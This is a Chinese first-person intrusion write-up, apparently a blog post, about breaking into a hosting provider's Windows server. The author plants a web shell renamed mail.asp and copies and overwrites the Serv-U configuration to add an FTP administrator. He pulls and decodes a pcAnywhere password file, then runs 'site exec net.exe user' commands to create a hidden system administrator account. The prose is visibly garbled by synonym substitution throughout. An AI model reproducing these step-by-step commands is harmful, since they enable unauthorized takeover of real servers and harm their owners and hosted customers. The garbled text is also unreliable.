最近的一次渗透

最近的一次渗透深夜2点多了，在和qq上一个心腹谈天，也不领会如何的叫我尝试他的空间商的效劳器是否安定，二话不说先发个 海阳木赶快去 1，首战成功 翻开ie 输出 http://domain.com/mail.asp (mail.asp是我给跷跷板改的名字),风气的先输出暗号，和我想的一律，效劳器遏止了fso！！没方法归还来，看看能不许欣赏目次，c:\ 发送吩咐 ，good~~ 果然不妨 c:\documents and settings-----0 c:\inetpub-----0 c:\program files-----0 c:\winnt-----0 c:\inetpub 没删 看看scripts映照有没有删掉，http://ip/scripts，归来404，删掉了处置员还不错，但没有废除分区的everyone的一切权力让他的效劳器遭到沉重的妨碍！ 在ie 输出 ftp://ip 归来 serv-u 什么不许隐姓埋名登岸，然而这个仍旧够了，确认了他的ftp效劳器段用的什么软硬件，找吧，普遍serv-u会装在c:\program files ，c:\program files 发送吩咐 ，没有：（，d:\ 发送吩咐 看到d:\program files，确定就在内里我内心想，居然看到了d:\program files\serv-u，谢天谢地！接下来我须要赢得servudaemon.ini这个文献，海阳跷跷板供给了copy 功效 d:\program files\serv-u\servudaemon.ini copy e:\www\我的伙伴的目次\ 发送吩咐 great ~~ 表露 command completed success 胜利 在ie 输出 http://domain.com/servudaemon.ini 把servudaemon.ini down下来了 接着把servudaemon.ini 正片到 当地机的serv-u里，（我的电脑上安置了serv-u，你即使没有安置一个，在肉鸡左右载文献也很简单），翻开 serviadmin ，你就会看到 肉鸡上的ftp用户了，然而 那些用户的口令是加密！尽管他咱们要赢得是处置员，增添一个用户,把他增添成处置员，生存！把这个新的servudaemon.ini 发给我伙伴，叫他用ftp上传，掩盖掉从来web目次里的 ok~~接下来没他的事了！！：） d:\program files\serv-u\servudaemon.ini  move  e:\www\我的伙伴的目次\bbs command completed success (提防：这边确定要先移除掉 servudaemon.ini 海阳跷跷板不会机动掩盖） d:\program files\serv-u\ 看看servudaemon.ini 是否移除去，真实没有了 e:\www\我的伙伴的目次\servudaemon.ini   copy  d:\program files\serv-u\ command completed success 到这边只有效劳珍视起，咱们就赢得了ftp的处置员权力，不妨经过当地机的servu 长途贯穿 肉鸡上的 servu ！浸透基础胜利 2，不料的创造 弄了半天，我还没扫描过他的效劳器，不要弄出什么弱口令什么的，前方做的可真是玩笑！：） 固然扫描截止没有那些，却不料的创造了5631 5632 端口，呵呵~~直到是什么的吗？pcanywhere的，去吧pcanywhere的暗号文献down 下来，用流光看暗号^o^ ,普遍pcanywhere的暗号文献都是放在 c:\documents and settings\all users\application data\symantec\pcanywhere  目次，pca.*****.cif 这个文献即是了 c:\documents and settings\all users\application data\symantec\pcanywhere\pca.23212.cif  copy  e:\www\我的伙伴的目次\ http://domain.com/pca.23212.cif 用流光读取了暗号，成功的连上了肉鸡，固然肉鸡是锁定的，否则不妨径直装方便之门了！ 但最大的成果，pcanywhere不妨重起效劳器，嘿嘿哈！我此刻是ftp的处置员了 长途连上肉鸡的servu,创造了一个naxin的用户，增添了 主目次 指向d:\www 并增添c d e f 分区的映照，十足权力！此刻我遏制着效劳器的生杀大权，固然不是体例处置员，但不妨经过ftp简略文献，呱呱嘎~~ 但是我创造ftp只能用port形式贯穿，在反面的浸透埋下了暗影 3，结果的成功 侵犯者有着激烈的遏制欲，我固然不会甘愿只获得ftp的处置员，我要的是体例处置员！ 用过serv-u的该当看到有个实行权力吧！嗬嗬用它就不妨来增添处置员，简直吩咐 shell>ftp ftp>open ip connected to ip. 220 serv-u ftp server v4.0 for winsock ready... user (ip:(none)): id 331 user name okay, please send complete e-mail address as password. password:password 230 user logged in, proceed. ftp> cd winnt 250 directory changed to /winnt ftp>cd system32 250 directory changed to /winnt/system32 ftp>quote site exec net.exe user cnaxin$ 123 /add 200 exec command successful (tid=33). ftp>quote site exec net.exe localhost administrators cnaxin$ /add 嘿嘿哈！实行了！！